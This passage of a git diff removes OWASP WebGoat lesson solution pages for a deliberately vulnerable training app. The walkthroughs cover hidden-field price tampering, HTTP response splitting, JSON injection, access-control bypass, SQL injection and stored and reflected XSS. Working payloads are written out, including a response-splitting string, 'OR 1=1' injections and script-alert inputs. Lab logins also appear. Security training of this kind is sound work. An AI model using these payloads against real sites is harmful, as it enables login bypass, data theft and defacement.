-correct answer and now you know the difficult password for user admin.
Developers
-will use hidden fields for tracking, login, pricing, etc.. information on a
-loaded page. While this is a convenient and easy mechanism for the developer,
-they often don't validate the information that is received from the hidden
-field. This lesson will teach the attacker to find and modify hidden fields to
-obtain a product for a price other than the price specified
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to exploit a hidden field to obtain a product at an incorrect
-price.
-
-
-
-
-
-
Figure 1 Lesson 4
-
-
-
-
Solution:
-
-
-
-
To change the
-hidden field you need to start your favorite HTTP Interceptor. You can use
-WebScarab from OWASP to intercept the request and change the hidden field.
-Configure your browser to use a local proxy. In Internet Explorer you can do
-this via "Tools" – "Internet Options" – "Connections" – "LAN Settings". You
-must define proxy "localhost" with port 8008.
Lesson
-Plan Title: How to
-Discover Clues in the HTML
-
-
-
-
Concept /
-Topic To Teach:
-
-
Developers
-are notorious for leaving statements like FIXME's, Code Broken, Hack, etc...
-inside the source code. Review the source code for any comments
-denoting passowrds, backdoors, or something doesn't work right.
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
-
-
Figure 1 Lesson 3
-
-
-
-
Right-click
-the page and select "View source"
-
-
-
-
Figure 2 View Source
-
-
-
-
Solution:
-
-
-
-
-
-
Examine the
-HTML source.
-
-
-
-
-
-
-
-
In the HTML
-source there is a comment that contains a user name admin and a password
-adminpw. Enter these values in WebGoat and click "Login"
This lesson
-presents the basics for understanding the transfer of data between the browser
-and the web application.
-
-Client Request: How HTTP works:
-
-
All HTTP transactions
-follow the same general format. Each client request and server response has
-three parts: the request or response line, a header section, and the entity
-body. The client initiates a transaction as follows:
-
-The client contacts the server and sends a document request
-
-
- GET /index.html?param=value HTTP/1.0
-
-Next, the client sends optional header information to inform the server of its
-configuration and the document formats it will accept.
-
- User-Agent: Mozilla/4.06 Accept: image/gif,
-image/jpeg, */*
-
-After sending the request and headers, the client may send additional data.
-This data is mostly used by CGI programs using the POST method.
-
-
-
-
General
-Goal(s):
-
-
Enter your
-name in the input field below and press "go" to submit. The server
-will accept the request, reverse the input, and display it back to the user,
-illustrating the basics of handling an HTTP request.
-
-The user should become familiar with the features of WebGoat by manipulating
-the above buttons to view hints and solution. We have to use WebScarab for the first time
-
-
-
-
Solution:
-
-
Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".
-
-
-
-
Figure 1 Intercept Request
-
-
-
-
Fill out your
-name and click the button Go! We get a new WebScarab window, where we can find the parameter person.
To
-help mitigate the cross site scripting threat, Microsoft has introduced a new cookie
-attribute entitled 'HttpOnly.' If this flag is set, then the browser should not
-allow client-side script to access the cookie. Since the attribute is
-relatively new, several browsers neglect to handle the new attribute properly.
-
-
-
-
General Goal(s):
-
-
The
-purpose of this lesson is to test whether your browser supports the HTTPOnly
-cookie flag. Note the value of the unique2u cookie. If your browser supports
-HTTPOnly, and you enable it for a cookie, client side code should NOT be able
-to read OR write to that cookie, but the browser can still send its value to
-the server. Some browsers only prevent client side read access, but don't
-prevent write access.
-
-
-
-
-
-
Figure 1 Lesson HTTPOnly Test
-
-
-
-
Solution:
-
-
-
-
HTTPOnly
-is not configured. When you click on "Read Cookie" you will get the following
-pop-up in JavaScript, displaying the cookies
-
-
-
-
-
-
Figure 2 All cookies
-
-
-
-
Select
-"Yes" to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
-WebScarab.
-
-
-
-
-
-
Figure 3 HTTP Request
-
-
-
-
-
-
Figure 4 HTTP Response with HTTPOnly
-cookie
-
-
-
-
-
-
Click
-on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.
-
-
-
-
Figure 5 Only JSESSIONID
-
-
-
-
-
-
Figure 6 HTTPOnly Success
-
-
-
-
Click
-on “Write cookie” which again only shows the JSESSIONID cookie.
Lesson
-Plan Title: How to
-Perform Http Splitting
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform HTTP Splitting attacks.
-
-
-
-
How the
-attacks works:
-
-
The attacker
-passes malicious code to the web server together with normal input. A victim
-application will not be checking for CR (carriage return, also given by %0d or
-\r) and LF (line feed, also given by %0a or \n)characters. These characters not
-only give attackers control of the remaining headers and body of the response
-the application intends to send, but also allows them to create additional
-responses entirely under their control.
-The effect of an HTTP Splitting attack is maximized when accompanied with a
-Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of
-the victim by fooling the cache to believe that the page hijacked using the
-HTTP splitting is a good one and it is indeed the server's copy.
-The attack happens using the HTTP Splitting attack plus adding the Last-Modified:
-header and setting it to a future date. This will force the browser to send If-Modified-Since
-request header, which gives the attacker the chance to intercept the server's
-reply and replace it with a '304 Not Modified' reply. A sample of a 304 response
-is:
-HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-
-
-
-
General
-Goal(s):
-
-
-
-
-This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
-stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
-Enter a language for the system to search by. You will notice that the
-application is redirecting your request to another resource on the server. You
-should be able to use the CR (%0d) and LF (%0a) to exploit the attack. Your
-exercise should be to force the server to send a 200 OK. If the screen changed
-as an effect to your attack, just go back to the homepage and after stage 2 is
-exploited successfully you will find the green check in the left menu.
-
-
-
-
-
-
-
-
Solution:
-
-
-Please note that this solution is written for Windows. If you use Linux you have to alter it.
-Windows uses a CR and LF for new Line. Linux uses only LF.
-So all the %0d%0a have to be replaced by %0a if you are using Linux.
-
-
-
Because the
-input is not validated you can inject any HTTP syntax, carriage returns and
-line-feed you want.
-
-
-
-
Enter a
-language to examine what's going on. You do have WebScarab intercepting HTTP
-requests and responses?
-
-
-
-
-
-
Figure 1 Language en
-
-
-
-
Figure 2 HTTP Request
-
-
-
-
-
-
Figure 3 First HTTP Response
-
-
-
-
-
-
Figure 4 Second HTTP Request
-
-
-
-
Now inject
-for the language en%0d%0a%0d%0a%0d%0a
-
-
-
-
-
-
Figure 5 First HTTP Request
-
-
-
-
-
-
Figure 6 First HTTP Response
-
-
-
-
The
-Content-Length: 0 will tell the server that the first request is over.
-
-
A 200 OK
-message looks like this: HTTP/1.1 200 OK
-
-
-
-
Lets see what
-you can do with: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked
-J</html>
-
-
-
-
-
-
Figure 7 HTTP Splitting attack
-
-
-
-
-
-
Figure 8 HTTP Response
-
-
-
-
-
-
Figure 9 Second HTTP Request
-
-
-
-
-
-
Figure 10 Second HTTP Response
-
-
-
-
-
-
Figure 11 Hacked!
-
-
-
-
Hit the "Back"
-button of your browser.
-
-
-
-
-
-
Figure 12 Stage 1 completed
-
-
-
-
Now you know
-how to do HTTP Splitting. You can abuse this technique to do a cache poisoning
-attack.
-
-
-
-
Cache
-poisoning requires manipulating the Last-Modified header. This must be changed
-to a date in the future.
Concept / Topic To Teach:
-Sensitive data should never sent in plaintext!
-Often applications switch to a secure connection after the authorization.
-An attacker could just sniff the login and use the gathered information
-to break into an account. A good webapplication always takes care of
-encrypting sensitive data.
-
-
-
General Goal(s):
-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data!
-
-
-Solution:
-
This lesson has two stages. In the first stage you try to sniff a password
-which is sent in plaintext. In the second stage you try the same
-but on a secure connection.
-
You need a client server setup for this lesson. Please refer
-to the Tomcat Setup in the Introduction section.
-
-Stage 1
-
Start a sniffer. If you do not have one we recommend wireshark, which
-is free: Wireshark. Make sure
-you are capturing on the right interface. Click on
-the submit button ans stop the capturing. Now analyze the captured data.
-
-
- Figure 1: Sniffed Traffic
-
-
As you can see we are interested in the HTTP Post request as
-the password is transmitted there. The field for the password has
-the name clear_pass and has as value sniffy. Of course
-this is also the correct answer and you are done with stage 1.
-
-Stage 2
-
-Now you have to switch to a secure connection. You archive this
-by changing the URL from http://... to https://... Sniff again the traffic
-as you have done in stage 1. As you will see there is not sent the password
-in plaintext. The server communicates with the application over a secure layer
-the so called Transport Layer Security (TLS) also called Secure Socket Layer (SSL).
-TLS is a hybrid encrypting protocol. A master secret is built to communicate.
-This master secret is built by using SHA-1 and MD5. All traffic between
-the Server and the Cleint is encrypted.
Lesson
-Plan Title: How to
-Perform JSON Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform JSON Injection Attacks.
-
-
-
-
How the
-attacks works:
-
-
JavaScript Object
-Notation (JSON) is a simple and effective lightweight data exchange format.
-JSON can be in a lot of forms such as arrays, lists, hashtables and other data
-structures. JSON is widely used in AJAX and Web2.0 application and is favored
-by programmers over XML because of its ease of use and speed. However, JSON,
-like XML is prone to Injection attacks. A malicious attacker can inject the
-reply from the server and inject some arbitrary values in there.
-
-
-
-
General
-Goal(s):
-
-
You
-are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code
-SEA.
-Once you enter the three digit code of the airport, an AJAX request will be
-executed asking for the ticket price.
-You will notice that there are two flights available, an expensive one with no
-stops and another cheaper one with 2 stops.
-Your goal is to try to get the one with no stops but for a cheaper price.
-
-
-
-
-
-
Figure 1 AJAX Security - JSON Injection
-
-
-
-
Solution:
-
-
Like with the previous lessons you need to manipulate the HTTP Response
-using WebScarab.
-
-
-
-
Examine the normal flow by entering the airport code BOS and SEA and
-intercept the HTTP Request and the HTTP Response in WebScarab.
-
-
-
-
-
-
Figure 2 Intercept HTTP Request
-
-
-
-
-
-
Figure 3 Intercept HTTP Response
-
-
-
-
Change the
-price for the expensive flight of $600 to $100 and click "Accept changes".
-
-
-
-
-
-
-
-
Figure 4 Updated price
-
-
-
-
-
-
Figure 5 Injected result
-
-
-
-
Select the flight
-with no stops and the updated price and click "Submit".
Lesson
-Plan Title: How to
-Bypass Client Side JavaScript Validation
-
-
-
-
Concept /
-Topic To Teach:
-
-
Client-side validation
-should not be considered a secure means of validating parameters. This
-validation only helps reducing the amount of server processing time for normal
-users who do not know the format of required input. Attackers can bypass these
-mechanisms easily in various ways. Any client-side validation should be
-duplicated on the server side. This will greatly reduce the likelihood of
-insecure parameter values being used in the application.
-
-
-
-
General
-Goal(s):
-
-
For this
-exercise, the web site requires that you follow certain rules when you fill out
-a form. The user should be able to break those rules, and send the website
-input that it wasn't expecting.
-
-
-
-
-
-
Figure 1 Lesson 6
-
-
-
-
There are two
-ways to complete this lesson. The first one is to submit a valid request like
-the one from the screenshot above and intercept this using WebScarab. The
-second way is to intercept the HTTP Response when loading the page and remove
-the Javascript that validates the values.
-
-
-
-
Solution 1
-
-
-
-
-
-
Figure 2 Intercept request
-
-
-
-
Add different
-symbols to the fields and click "Accept changes".
-
-
-
-
-
-
Figure 3 Change parameters
-
-
-
-
-
-
Figure 4 Lesson 6 Completed
-
-
-
-
Solution 2
-
-
-
-
Reload the
-page by clicking on the menu item "How to bypass Client-Side Javascript
-Validation" and intercept the response in WebScarab.
-
-
-
-
-
-
Figure 5 Enable "Intercept responses"
-
-
-
-
-
-
Figure 6 Intercepted response
-
-
-
-
If you remove
-the onclick="validate();" the "Submit" button will not work anymore.
-
-
Locate the
-validate() Javascript function in the HTML page.
-
-
-
-
-
-
Figure 7 The function validate()
-
-
-
-
Removing the regular
-expressions will remove the Javascript validation and submit the form.
-
-
-
-
-
-
Figure 8 Changed validate() function
-
-
-
-
Click "Accept
-changes". This returns a HTML page like before but without any regular
-expression checks.
-
-
-
-
-
-
Figure 9 It looks the same
-
-
-
-
Change the
-fields in the HTML page to contain symbols like @#@@# and click "Submit".
-
-
-
-
-
-
Figure 10 No more regular expression checks
-
-
-
-
-
-
Figure 11 Lesson 6 Completed
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
deleted file mode 100644
index 18aa18be9..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
+++ /dev/null
@@ -1,50 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage2
-
-
-
-
Lesson Plan Title: Role Based Access Control: Stage 2
-
-
Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-
General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-You have to be sure that the user is AUTHORIZED to do an action! So you have to check for his authorization.
-You have to write some code in the class
-org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
-Alter the handleRequest method as there is happening the dispatching.
-There is already a method called isAuthorized which you can use:
-
-Try the attack again and you will see that the authorization fails and the
-lesson is completed.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
deleted file mode 100644
index f6ab88361..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
+++ /dev/null
@@ -1,56 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage4
-
-
-
-
Lesson Plan Title: Role Based Access Control: Stage 4
-
-
Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-
General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-You have to be sure that the user is AUTHORIZED to do an action and that
-he is authorized to do this action on a certain employee! So you have to check for his authorization.
-You have to write some code in the class
-org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
-Alter the handleRequest method as there is happening the dispatching.
-Action has already a method called isAuthorizedForEmployee which you can use:
-
-Try the attack again and you will see that the authorization fails and the
-lesson is completed.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
deleted file mode 100644
index 004e26185..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
+++ /dev/null
@@ -1,48 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage1
-
-
-
-
Lesson Plan Title: Role Based Access Control: Stage 1
-
-
Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-
General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-To solve this exercise you have to know the name of the action, which
-deletes employees. Of course you could just guess
-it because it has a really logical name.
-But we will look it up. So your first step is to log in as John with john as
-password. Use WebScarab to intercept the delete request.
-
-
-
-As you can see the delete action is called DeleteProfile.
-Now log in as Tom. Click in the list on his name and make sure WebScarab
-will intercept the next request. Click on a button, for example the
-'ViewProfile' button. Change in WebScarab the action to DeleteProfile
-and you are done!
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
deleted file mode 100644
index e94e42c45..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage3
-
-
-
-
Lesson Plan Title: Role Based Access Control: Stage 3
-
-
Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-
General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-In stage 1 we tried to use an action we are not authorised to use.
-In this stage we want to view a profile of an other person. We have the permission
-for the action ViewProfile but we should not have the permission to see a profile
-of another employee!
-
-
-Log in as Tom with tom as password. Click on Tom's name in the list and make sure
-webscarab will intercept the next request. Change the employee_id for example to 101.
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-
Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-
It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-
General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-
Solution:
-Choose Larry to log in with password larry. Select yourself from the list
-and make sure that WebScarab will intercept the next request. Replace the id 101 with following:
-
-101 OR 1=1 ORDER BY salary desc
-
With '101 OR 1=1' we have a SQL Statement which is always true. It will
-get all the employees from the db but only return one of them. That is why we have to ensure we get
-the "Big Fish" which is the employee earning most. With 'ORDER BY SALARY DESC' we guarantee exactly this.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html
deleted file mode 100644
index e09478565..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html
+++ /dev/null
@@ -1,87 +0,0 @@
-
-
-
-
-Solution Lab SQL Injection Stage2
-
-
-
-
Lesson Plan Title: How to Perform a SQLInjection
-
-
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-
Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-
It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-
General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-To prevent a SQLInjection you can use "Parametreized Queries". This kind of
-query makes it possible to use every input of an user as a parameter.
-In this lesson you have to change org.owasp.webgoat.lessons.SQLInjection.Login.java
-The query execution in the method login looks like this:
-To paramerize the Query you have to replace the userinput with questionmarks:
-String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
-
-
-Now follows the try block with the getConnection method:
-
-try
-{
- Connection connection = WebSession.getConnections(s);
-
-
-The next step is to do a so called "PrepareStatement":
-PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-
-Now that the query is prepared we have to add the parameters to the query:
-
-statement.setString(1, userId);
-statement.setString(2, password);
-
-
-
-We are ready to execute the query!
-
-ResultSet answer_results = statement.executeQuery();
-
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-
Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-
It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-
General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-The solution is simular to Stage2. That is why here is only a short solution.
-You have to alter the class org.owasp.webgoat.lessons.SQLInjection.ViewProfile.java
-Alter the method getEmployeeProfile to something like this:
-
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-
Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-
It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-
General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-
Solution:
-Select Neville as user to log in. Make sure WebScarab will intercept the next request.
-Hit the Login Button and Change the password parameter in WebScarab to smith' OR '1' = '1.
-Et voila you are logged in as Neville without knowing the password as the query
-will lookup if the password is smith and if not it controls if 1=1 what
-return true.
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-The Solution is rather simular to stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java.
-Alter the method getRequestParameter. The body of the mehtod should look something like this:
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
deleted file mode 100644
index fd834d3c0..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-
Solution:
-You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is
-placed in the package org.owasp.webgoat.lessons.CrossSiteScripting
-The place to code is marked! Following code will work:
-
-This validation allows following:
-\s = whitspace: \t\n\x0B\f\r
-\w = word: a-zA-Z_0-9
-and the characters - and ,
-
-
-Use of any other character will throw a Validation Exception.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
deleted file mode 100644
index 52a4b3283..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-
Solution:
-You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
-
This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class.
-Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
deleted file mode 100644
index e53bc0e3c..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-
Solution:
-First log in as an user for example as Larry with password larry. Now click on
-the 'SearchStaff' Button. Burry a script in the field for example:
-<script>alert("Dangerous");</script>. Now hit
-the 'FindProfile' Button and you are done.
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-
Solution:
-Log in as David with david as password. Choose Bruce from the List and click
-on the 'ViewProfile' Button.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html
deleted file mode 100644
index a57dc020a..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html
+++ /dev/null
@@ -1,36 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-
Solution:
-First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button.
-Now should appear Tom's Profile. Click on the 'Edit Profile' Button and try an XSS attack on the street filed.
-For example: <script>alert("Got Ya");</script>
-Click on the UpdateProfile Button and Log out.
-
-
-
-
-
-Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the
-ViewProfile Button. Congratulation! You have completed the lesson.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png b/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png
deleted file mode 100644
index 83aa7983e..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/LogSpoofing.html b/src/main/webapp/lesson_solutions_1/LogSpoofing.html
deleted file mode 100644
index c1538709d..000000000
--- a/src/main/webapp/lesson_solutions_1/LogSpoofing.html
+++ /dev/null
@@ -1,793 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Log Spoofing.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches attempts to fool the human eye.
-
